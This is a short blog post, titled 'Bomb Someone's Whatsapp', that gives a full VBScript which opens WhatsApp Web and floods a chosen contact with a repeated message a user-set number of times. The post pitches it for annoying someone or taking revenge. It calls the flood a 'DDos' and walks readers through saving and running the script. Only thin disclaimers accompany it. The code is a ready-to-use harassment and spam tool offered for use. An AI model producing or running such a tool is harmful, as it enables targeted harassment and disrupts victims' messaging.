Header Ads

BOMB SOMEONES WHATSAPP

                 Bomb Someone's Whatsapp

Hellow guys, you may ever have wanted to annoy someone or make a bad joke, or maybe revenge against someone who annoyed you so much, well, i may have one way for you to do that, and remember, dont use this code to harm others, be responsible, we have the law.



So we are going to go through a code that will bomb anyones whatsapp and crash his whatsapp completely using a vbs script. no programming skills required.


Requirements;
*windows pc
*internet connection

 Heres the code;
copy and paste the code below into notepad, then save it as anyname.vbs  {do not forget .vbs} e.g bomb.vbs}

' InputBoxes
Contact = InputBox("Which Conctact Do You Want To DDos?", "WhatsApp DDos")
Message = InputBox("What Is The Message?","WhatsApp DDos")
T = InputBox("How Many Times Needs It To Be Send?","WhatsApp DDos")
If MsgBox("You've Filled It In Correctely", 1024 + vbSystemModal, "WhatsApp DDos") = vbOk Then

' Go To WhatsApp
Set WshShell = WScript.CreateObject("WScript.Shell")
Return = WshShell.Run("https://web.whatsapp.com/", 1)

' Loading Time

If MsgBox("Is WhatsApp Loaded?" & vbNewLine & vbNewLine & "Press No To Cancel", vbYesNo + vbQuestion + vbSystemModal, "WhatsApp DDos") = vbYes Then

' Go To The WhatsApp Search Bar
WScript.Sleep 50
WshShell.SendKeys "{TAB}"

' Go To The Contacts Chat
WScript.Sleep 50
WshShell.SendKeys Contact
WScript.Sleep 50
WshShell.SendKeys "{ENTER}"

' The Loop For The Messages
For i = 0 to T
WScript.Sleep 5
WshShell.SendKeys Message
WScript.Sleep 5
WshShell.SendKeys "{ENTER}"
Next

' End Of The Script
WScript.Sleep 3000
MsgBox "DDosing Of " + Contact + " Is Done", 1024 + vbSystemModal, "DDos Is Done"

' Canceled Script
Else
MsgBox "Process Has Been Canceled", vbSystemModal, "DDos Canceled"
End If
Else
End If



Now run the .vbs script you saved and follow the instructions to enter number, and make your choices as prompted, wait for owner to go offline.
note; if you understand thhis code well, you may change to messages in the script to have your own messages to be displayed on the persons screen when bombing the number. Do not forget to start with the country code when entering phone number.

CAUTION!! this is for informational purposes only.

FOLLOW US FOR MORE AND DO NOT FORGET TO SHARE BELOW, YOUR QUESTIONS IN THE COMMENTS.

No comments

Thank you for checking in.have a nice day and come again.

Powered by Blogger.